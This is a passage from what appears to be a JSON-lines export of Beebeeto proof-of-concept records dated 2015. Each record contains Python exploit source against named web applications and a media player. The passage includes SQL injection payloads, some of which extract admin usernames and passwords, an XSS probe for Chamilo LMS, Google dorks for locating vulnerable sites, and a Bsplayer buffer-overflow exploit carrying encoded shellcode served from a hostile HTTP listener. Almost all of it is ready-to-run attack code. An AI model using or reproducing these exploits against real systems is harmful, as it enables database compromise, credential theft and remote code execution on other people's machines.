'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'ShopBuilder',\r\n 'vul_version': ['*'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['ShopBuilder\u6f0f\u6d1e', '/?m=product&s=list&ptype', 'SQL Injection', 'ShopBuilder'],\r\n 'desc': '?m=product&s=list&ptype=0\uff0csqli=ptype',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-080770'],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n payload = (\"/?m=product&s=list&ptype=0%27%20and%201%3Dupdatexml%281%2Cconcat%280x5c%2Cmd5\"\r\n \"%28222222%29%29%2C1%29%23\")\r\n verify_url = url + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = requests.get(url).content\r\n if 'e3ceb5881a0a1fdaad01296d7554868d' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "?m=product&s=list&ptype=0\uff0csqli=ptype", "app_name": "ShopBuilder", "id": "poc-2015-0074", "layer4_protocol": null}
{"create_date": "2015-03-27 19:57:52", "name": "Southidc \u5357\u65b9\u6570\u636e 11.0 /news_search.asp SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Ca2fux1n", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "southidc,news_search.asp,SQL Injection,\u5357\u65b9\u6570\u636e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0073',\r\n 'name': 'Southidc \u5357\u65b9\u6570\u636e 11.0 /news_search.asp SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'ca2fux1n',\r\n 'create_date': '2015-03-24',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'southidc',\r\n 'vul_version': ['11.0'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['southidc', 'news_search.asp', 'SQL Injection', '\u5357\u65b9\u6570\u636e'],\r\n 'desc': 'southidc v10.0\u5230v11.0\u7248\u672c\u4e2dnews_search.asp\u6587\u4ef6\u5bf9key\u53c2\u6570\u6ca1\u6709\u9002\u5f53\u8fc7\u6ee4\uff0c\u5bfc\u81f4SQL\u6ce8\u5165\u6f0f\u6d1e\u3002',\r\n 'references': ['http://sebug.net/vuldb/ssvid-62399'],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/news_search.asp?'\r\n payload = (\"key=7'%20Union%20select%200,username%2bchr(124)%2bpassword,\"\r\n \"2,3,4,5,6,7,8,9%20from%20admin%20where%1%20or%20''='&otype=title&Submit=%CB%D1%CB%F7\")\r\n req = urllib2.Request(verify_url + payload)\r\n res = urllib2.urlopen(req)\r\n content = res.read()\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url + payload\r\n if res.code == 200:\r\n pattern = re.compile(r'.*?\\\">(?P<username>[a-zA-Z0-9]+)\\|(?P<password>[a-zA-Z0-9]+)',re.I|re.S)\r\n match = pattern.match(content)\r\n if match:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url + payload\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "southidc v10.0\u5230v11.0\u7248\u672c\u4e2dnews_search.asp\u6587\u4ef6\u5bf9key\u53c2\u6570\u6ca1\u6709\u9002\u5f53\u8fc7\u6ee4\uff0c\u5bfc\u81f4SQL\u6ce8\u5165\u6f0f\u6d1e\u3002", "app_name": "Southidc", "id": "poc-2015-0073", "layer4_protocol": null}
{"create_date": "2015-03-25 14:20:07", "name": "Bsplayer 2.68 Universal HTTP Response Exploit", "level": "\u9ad8\u5371", "batchable": 0, "author": "\u96f7\u8702", "rank": 4, "port": null, "vul_type": "\u7f13\u51b2\u533a\u6ea2\u51fa", "tag": "Bsplayer\u6f0f\u6d1e,Bsplayer\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e,HTTP Response Exploit", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport sys\r\nimport socket\r\nimport urlparse\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0072',\r\n 'name': 'Bsplayer 2.68 Universal HTTP Response Exploit',\r\n 'author': 'fady_osman',\r\n 'create_date': '2015-03-24',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Bsplayer',\r\n 'vul_version': ['2.68'],\r\n 'type': 'Buffer Overflow',\r\n 'tag': ['Bsplayer\u6f0f\u6d1e', 'Bsplayer\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e', 'HTTP Response Exploit'],\r\n 'desc': '''\r\n Bsplayer suffers from a buffer overflow vulnerability when processing the HTTP response when opening a URL.\r\n In order to exploit this bug I partially overwrited the seh record to land at pop pop ret instead of the full\r\n address and then used backward jumping to jump to a long jump that eventually land in my shellcode.\r\n\r\n Tested on : windows xp sp1 - windows 7 sp1 - Windows 8 Enterprise it might work in other versions as well just give it a try :)\r\n\r\n My twitter: @fady_osman\r\n My youtube: https://www.youtube.com/user/cutehack3r\r\n ''',\r\n 'references': ['http://www.exploit-db.com/exploits/36477/',\r\n ],\r\n },\r\n }\r\n\r\n def _init_user_parser(self): # \u5b9a\u5236\u547d\u4ee4\u884c\u53c2\u6570\r\n self.user_parser.add_option('-p','--port',\r\n action='store', dest='port', type='string', default=80,\r\n help='about port msg.')\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n s = socket.socket() # Create a socket object\r\n url = urlparse.urlparse(args['options']['target']).netloc\r\n host = socket.gethostbyname(url) # Ip to listen to.\r\n port = args['options']['port'] # Reserve a port for your service.\r\n s.bind((host, port)) # Bind to the port\r\n if args['options']['verbose']:\r\n print \"[*] Listening on port \" + str(port)\r\n s.listen(10) # Now wait for client connection.\r\n c, addr = s.accept() # Establish connection with client.\r\n # Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.\r\n if args['options']['verbose']:\r\n print(('[*] Sending the payload first time', addr))\r\n c.recv(1024)\r\n #seh and nseh.\r\n buf = \"\"\r\n buf += \"\\xbb\\xe4\\xf3\\xb8\\x70\\xda\\xc0\\xd9\\x74\\x24\\xf4\\x58\\x31\"\r\n buf += \"\\xc9\\xb1\\x33\\x31\\x58\\x12\\x83\\xc0\\x04\\x03\\xbc\\xfd\\x5a\"\r\n buf += \"\\x85\\xc0\\xea\\x12\\x66\\x38\\xeb\\x44\\xee\\xdd\\xda\\x56\\x94\"\r\n buf += \"\\x96\\x4f\\x67\\xde\\xfa\\x63\\x0c\\xb2\\xee\\xf0\\x60\\x1b\\x01\"\r\n buf += \"\\xb0\\xcf\\x7d\\x2c\\x41\\xfe\\x41\\xe2\\x81\\x60\\x3e\\xf8\\xd5\"\r\n buf += \"\\x42\\x7f\\x33\\x28\\x82\\xb8\\x29\\xc3\\xd6\\x11\\x26\\x76\\xc7\"\r\n buf += \"\\x16\\x7a\\x4b\\xe6\\xf8\\xf1\\xf3\\x90\\x7d\\xc5\\x80\\x2a\\x7f\"\r\n buf += \"\\x15\\x38\\x20\\x37\\x8d\\x32\\x6e\\xe8\\xac\\x97\\x6c\\xd4\\xe7\"\r\n buf += \"\\x9c\\x47\\xae\\xf6\\x74\\x96\\x4f\\xc9\\xb8\\x75\\x6e\\xe6\\x34\"\r\n buf += \"\\x87\\xb6\\xc0\\xa6\\xf2\\xcc\\x33\\x5a\\x05\\x17\\x4e\\x80\\x80\"\r\n buf += \"\\x8a\\xe8\\x43\\x32\\x6f\\x09\\x87\\xa5\\xe4\\x05\\x6c\\xa1\\xa3\"\r\n buf += \"\\x09\\x73\\x66\\xd8\\x35\\xf8\\x89\\x0f\\xbc\\xba\\xad\\x8b\\xe5\"\r\n buf += \"\\x19\\xcf\\x8a\\x43\\xcf\\xf0\\xcd\\x2b\\xb0\\x54\\x85\\xd9\\xa5\"\r\n buf += \"\\xef\\xc4\\xb7\\x38\\x7d\\x73\\xfe\\x3b\\x7d\\x7c\\x50\\x54\\x4c\"\r\n buf += \"\\xf7\\x3f\\x23\\x51\\xd2\\x04\\xdb\\x1b\\x7f\\x2c\\x74\\xc2\\x15\"\r\n buf += \"\\x6d\\x19\\xf5\\xc3\\xb1\\x24\\x76\\xe6\\x49\\xd3\\x66\\x83\\x4c\"\r\n buf += \"\\x9f\\x20\\x7f\\x3c\\xb0\\xc4\\x7f\\x93\\xb1\\xcc\\xe3\\x72\\x22\"\r\n buf += \"\\x8c\\xcd\\x11\\xc2\\x37\\x12\"\r\n\r\n jmplong = \"\\xe9\\x85\\xe9\\xff\\xff\"\r\n nseh = \"\\xeb\\xf9\\x90\\x90\"\r\n # Partially overwriting the seh record (nulls are ignored).\r\n seh = \"\\x3b\\x58\\x00\\x00\"\r\n buflen = len(buf)\r\n response = \"\\x90\" *2048 + buf + \"\\xcc\" * (6787 - 2048 - buflen) + jmplong + nseh + seh #+ \"\\xcc\" * 7000\r\n c.send(response)\r\n c.close()\r\n c, addr = s.accept() # Establish connection with client.\r\n # Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.\r\n if args['options']['verbose']:\r\n print(('[*] Sending the payload second time', addr))\r\n c.recv(1024)\r\n c.send(response)\r\n c.close()\r\n s.close()\r\n args['success'] = True\r\n return args\r\n\r\n verify = exploit\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Tested on : windows xp sp1 - windows 7 sp1 - Windows 8 Enterprise it might work in other versions as well just give it a try :)", "app_name": "Other", "id": "poc-2015-0072", "layer4_protocol": null}
{"create_date": "2015-03-24 15:02:28", "name": "UCenter Home 2.0 /shop.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "Discuz UCenter Home\u6f0f\u6d1e,/shop.php\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0069',\r\n 'name': 'UCenter Home 2.0 /shop.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2015-03-24',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz',\r\n 'vul_version': ['2.0'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['Discuz UCenter Home\u6f0f\u6d1e', '/shop.php\u6f0f\u6d1e', 'php'],\r\n 'desc': '''\r\n Script HomePage : http://u.discuz.net/\r\n Dork : Powered by UCenter inurl:shop.php?ac=view\r\n Dork 2 : inurl:shop.php?ac=view&shopid=\r\n ''',\r\n 'references': ['http://www.exploit-db.com/exploits/14997/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n payload = (\"/shop.php?ac=view&shopid=253 AND (SELECT 4650 FROM(SELECT COUNT(*),\"\r\n \"CONCAT(0x716b6a6271,(SELECT (CASE WHEN (4650=4650) THEN 1 ELSE 0 END)),\"\r\n \"0x7178787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)\")\r\n verify_url = url + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = requests.get(verify_url).content\r\n if 'qkjbq1qxxpq1' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Script HomePage : http://u.discuz.net/\r\nDork : Powered by UCenter inurl:shop.php?ac=view\r\nDork 2 : inurl:shop.php?ac=view&shopid=", "app_name": "Discuz", "id": "poc-2015-0069", "layer4_protocol": null}
{"create_date": "2015-03-20 15:16:01", "name": "Chamilo LMS 1.9.10 /main/calendar/agenda_list.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "user1018", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Chamilo LMS\u6f0f\u6d1e,xss\u6f0f\u6d1e,\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0068',\r\n 'name': 'Chamilo LMS 1.9.10 /main/calendar/agenda_list.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': 'user1018',\r\n 'create_date': '2015-03-20',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Chamilo LMS', \r\n 'vul_version': ['1.9.10'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['Chamilo LMS\u6f0f\u6d1e', 'xss\u6f0f\u6d1e', '\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e', 'php'],\r\n 'desc': 'N/A',\r\n 'references': ['http://www.exploit-db.com/exploits/36435/',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target'] + '/main/calendar/agenda_list.php'\r\n verify_url = url + '?type=personal%27%3E%3Cscript%3Econfirm%281%29%3C%2fscript%3E%3C%21--'\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = response.read()\r\n if \"<script>confirm(1)</script>\" in content:\r\n args['success'] = True\r\n args['poc_ret']['xss_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "Other", "id": "poc-2015-0068", "layer4_protocol": null}
{"create_date": "2015-03-18 14:42:11", "name": "GeniXCMS v0.0.1 /index.php SQL INJECTION POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Ca2fux1n", "rank": 2, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "GeniXCMS SQL\u6ce8\u5165\u6f0f\u6d1e,/index.php\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0067',\r\n 'name': 'GeniXCMS v0.0.1 /index.php SQL INJECTION POC',\r\n 'author': 'ca2fux1n',\r\n 'create_date': '2015-03-11',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'GeniXCMS',\r\n 'vul_version': ['0.0.1'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['GeniXCMS SQL\u6ce8\u5165\u6f0f\u6d1e', '/index.php\u6f0f\u6d1e', 'php'],\r\n 'desc': 'GeniXCMS v0.0.1 Remote Unauthenticated SQL Injection Exploite',\r\n 'references': ['http://www.exploit-db.com/exploits/36321/',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n payload = \"/genixcms/index.php?page=1' UNION ALL SELECT 1,2,md5('bb2'),4,5,6,7,8,9,10 and 'j'='j\"\r\n verify_url = url + payload\r\n content = requests.get(verify_url).content\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n if '0c72305dbeb0ed430b79ec9fc5fe8505' in content:\r\n args['options']['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "GeniXCMS v0.0.1 Remote Unauthenticated SQL Injection Exploite", "app_name": "Other", "id": "poc-2015-0067", "layer4_protocol": null}
{"create_date": "2015-03-13 10:10:49", "name": "GNUboard /bbs/poll_update.php SQL Injection Vulnerability POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "GNUboard\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/bbs/poll_update.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0063',\r\n 'name': 'GNUboard /bbs/poll_update.php SQL Injection Vulnerability POC',\r\n 'author': '1024',\r\n 'create_date': '2015-03-13',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'GNUboard',\r\n 'vul_version': ['*'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['GNUboard\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/bbs/poll_update.php', 'php'],\r\n 'desc': 'GNUboard \u901a\u7528\u578b\u6ce8\u5165SQL Injection\uff0c\u636e\u6d4b\u8bd5\u57fa\u672c\u4e0a\u5927\u90e8\u5206\u7684\u7248\u672c\u90fd\u53ef\u4ee5.',\r\n 'references': ['N/A',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n req = requests.get(url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + url\r\n if req.status_code == 200:\r\n po_ids = re.findall(r'name=\"po_id\" value=\"(\\d+)\"', req.content)\r\n for po_id in po_ids:\r\n verify_url = url + '/poll_update.php'\r\n post = (\"_SERVER[REMOTE_ADDR]=86117&po_id=%s&gb_poll=1=1 and(select 1 from(select\"\r\n \"count(*),concat((select md5(123)),floor(rand(0)*2))x from information_schema.tables group by\"\r\n \"x)a)\") % po_id\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n print '[*] POST Content: ' + post\r\n reqp = requests.post(verify_url, data=post)\r\n if reqp.status_code == 200 and '202cb962ac59075b964b07152d234b70' in reqp.content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['post_content'] = post\r\n return args\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "GNUboard \u901a\u7528\u578b\u6ce8\u5165SQL Injection\uff0c\u636e\u6d4b\u8bd5\u57fa\u672c\u4e0a\u5927\u90e8\u5206\u7684\u7248\u672c\u90fd\u53ef\u4ee5.", "app_name": "Gnuboard", "id": "poc-2015-0063", "layer4_protocol": null}
{"create_date": "2015-03-12 16:53:49", "name": "Ecshop /spellchecker.php \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 1, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Ecshop\u6f0f\u6d1e,Ecshop\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e,/spellchecker.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0060',\r\n 'name': 'Ecshop /spellchecker.php \u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2015-03-12',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Ecshop',\r\n 'vul_version': ['*'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Ecshop\u6f0f\u6d1e', 'Ecshop\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e', '/spellchecker.php', 'php'],\r\n 'desc': 'N/A',\r\n 'references': ['https://www.bugscan.net/#!/n/293',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php'\r\n verify_url = args['options']['target'] + payload\r\n req = requests.get(verify_url)\r\n if req.status_code == 200:\r\n m = re.search('in <b>([^<]+)</b> on line <b>(\\d+)</b>', req.content)\r\n if m:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n args['success'] = False\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "Ecshop", "id": "poc-2015-0060", "layer4_protocol": null}
{"create_date": "2015-03-12 16:43:01", "name": "BlueCMS v1.6 sp1 /ad_js.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "BlueCMS\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/ad_js.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0059',\r\n 'name': 'BlueCMS v1.6 sp1 /ad_js.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2015-03-12',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'BlueCMS',\r\n 'vul_version': ['1.6'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['BlueCMS\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/ad_js.php', 'php'],\r\n 'desc': '''\r\n BlueCMS(\u5730\u65b9\u5206\u7c7b\u4fe1\u606f\u95e8\u6237\u4e13\u7528CMS\u7cfb\u7edf)\r\n \r\n $ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : ''; //\u6839\u76ee\u5f55\u4e0b\u5176\u4ed6\u6587\u4ef6\u90fd\u505a\u4e86\u5f88\u597d\u7684\u8fc7\u6ee4\uff0c\r\n \u5bf9\u6570\u5b57\u578b\u53d8\u91cf\u51e0\u4e4e\u90fd\u7528\u4e86intval()\u505a\u9650\u5236\uff0c\u552f\u72ec\u6f0f\u4e86\u8fd9\u4e2a\u6587\u4ef6\uff0c\u5c45\u7136\u53ea\u662f\u7528\u4e86trim()\u53bb\u9664\u5934\u5c3e\u7a7a\u683c\u3002\r\n $ad = $db->getone(\"SELECT * FROM \".table('ad').\" WHERE ad_id =\".$ad_id); //\u76f4\u63a5\u4ee3\u5165\u67e5\u8be2\u3002\r\n ''',\r\n 'references': ['http://www.myhack58.com/Article/html/3/7/2010/27774_2.htm',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = \"/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,md5(3.1415),md5(3.1415)\"\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '63e1f04640e83605c1d177544a5a0488' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "BlueCMS(\u5730\u65b9\u5206\u7c7b\u4fe1\u606f\u95e8\u6237\u4e13\u7528CMS\u7cfb\u7edf)\r\n\r\n$ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : ''; //\u6839\u76ee\u5f55\u4e0b\u5176\u4ed6\u6587\u4ef6\u90fd\u505a\u4e86\u5f88\u597d\u7684\u8fc7\u6ee4\uff0c\r\n\u5bf9\u6570\u5b57\u578b\u53d8\u91cf\u51e0\u4e4e\u90fd\u7528\u4e86intval()\u505a\u9650\u5236\uff0c\u552f\u72ec\u6f0f\u4e86\u8fd9\u4e2a\u6587\u4ef6\uff0c\u5c45\u7136\u53ea\u662f\u7528\u4e86trim()\u53bb\u9664\u5934\u5c3e\u7a7a\u683c\u3002\r\n$ad = $db->getone(\"SELECT * FROM \".table('ad').\" WHERE ad_id =\".$ad_id); //\u76f4\u63a5\u4ee3\u5165\u67e5\u8be2\u3002", "app_name": "Other", "id": "poc-2015-0059", "layer4_protocol": null}
